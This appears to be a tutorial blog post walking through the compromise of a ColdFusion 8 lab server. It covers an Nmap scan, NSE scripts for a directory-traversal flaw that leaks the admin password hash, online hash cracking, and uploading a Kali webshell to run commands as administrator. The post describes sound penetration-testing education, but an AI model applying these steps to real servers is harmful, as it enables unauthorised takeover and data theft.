Exploiting ColdFusion 8 Server
Adobe ColdFusion is a commercial web application development software created by JJ Allaire in 1995. The CFML programming language is used in this platform. The purpose of ColdFusion is to connect simple HTML pages to a database. On July 30, 2007, Adobe Systems released ColdFusion 8 with improvements making it more efficient than previous versions.
However, it had some major vulnerabilities- Information Disclosure, Cross Site Scripting (XSS), SQL Injection and exposure of the Admin Interface. A quick search on google shows that versions vulnerable to information disclosure are still in use today.
In this example, I am going to demonstrate exploiting a ColdFusion 8 server with a webshell.
Nmap Scan
Fire up Kali Linux and perform basic Nmap scan with -A flag to detect port 80/443 running on system.
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017–06–14 23:32 EDT
Nmap scan report for 192.168.0.4
Host is up (0.22s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 4.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/4.0
|_http-title: Hack ME!
MAC Address: 00:50:56:89:15:C0 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP
Running (JUST GUESSING): Microsoft Windows 2003|XP|2000 (89%), Apple embedded (86%)
According to the Nmap scan result, we can easily discover that this server is running a http service on TCP/80. Then, we have to verify that this server is running ColdFusion and we can check for vulnerabilities with some NSE scripts — http-vuln-cve2010–2861.nse, http-coldfusion-subzero.nse and http-adobe-coldfusion-apsa1301.nse. In screenshot below, I ran http-vuln-cve2010–2861.nse and it revealed that this site is vulnerable to Directory Traversal Vulnerability and extracted the password hash.
Figure 1: NSE script
Cracking the hash
Yay! We got the hash and we should try to crack this hash at https://crackstation.net/. It is a powerful cracking online website. Thanks to crackstation…
Figure 2: Crackstaion
With this, we have full admin access to the Adobe ColdFusion 8 server.
Figure 3: Admin panel
After browsing through the pages, I discovered the web server’s directory path. This is under Server Settings /Mappings.
Figure 4: webserver location
Getting Shell on The Server
With the login, we have already obtained administrative privileges within Coldfusion. Now, we are going to dig deeper in order to get windows administrator privileges. Kali Linux has a great variety of tools built into it, so its no surprise there’s one webshell for the CFM language in default Kali Linux directory /usr/share/webshells/cfm/cfexec.cfm. Subsequently, set up an apache2 server and upload this shell to server.
Figure 5: uploading the webshell
Browse to the web directory where the web-shell is. This page will allow us to execute window commands as an administrator.
Figure 6: browsing webshell location
Figure 7: executing windows command
Figure 8: Proof of administrative privilege
In conclusion, ethical hackers can execute commands as a high privileged user. He or she can shut down this web server or steal confidential data. System administrators should always regularly update the ColdFusion server in order to avoid vulnerability.
